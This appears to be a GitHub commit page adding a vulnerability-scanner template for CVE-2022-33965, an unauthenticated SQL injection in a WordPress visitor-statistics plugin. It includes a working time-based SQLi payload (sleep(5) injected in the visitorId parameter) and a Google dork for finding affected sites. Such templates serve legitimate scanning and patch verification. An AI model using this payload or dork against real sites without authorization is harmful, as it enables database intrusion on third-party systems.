Merge pull request #5626 from theamanrawat/CVE-2022-33965

Added template for CVE-2022-33965
patch-1
Prince Chaddha 2022-10-11 12:49:42 +05:30 committed by GitHub
commit 38f8780495
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2022-33965
info:
name: WP Visitor Statistics (Real Time Traffic) < 5.8 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection (SQLi) vulnerabilities in Osamaesh WP Visitor Statistics plugin <= 5.7 at WordPress.
reference:
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
- https://wordpress.org/plugins/wp-stats-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
classification:
cve-id: CVE-2022-33965
metadata:
verified: true
google-dork: inurl:"/wp-content/plugins/wp-stats-manager"
tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
requests:
- raw:
- |
@timeout: 15s
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: regex
regex:
- "^1331' and sleep\\(5\\) or '$"
- type: status
status:
- 200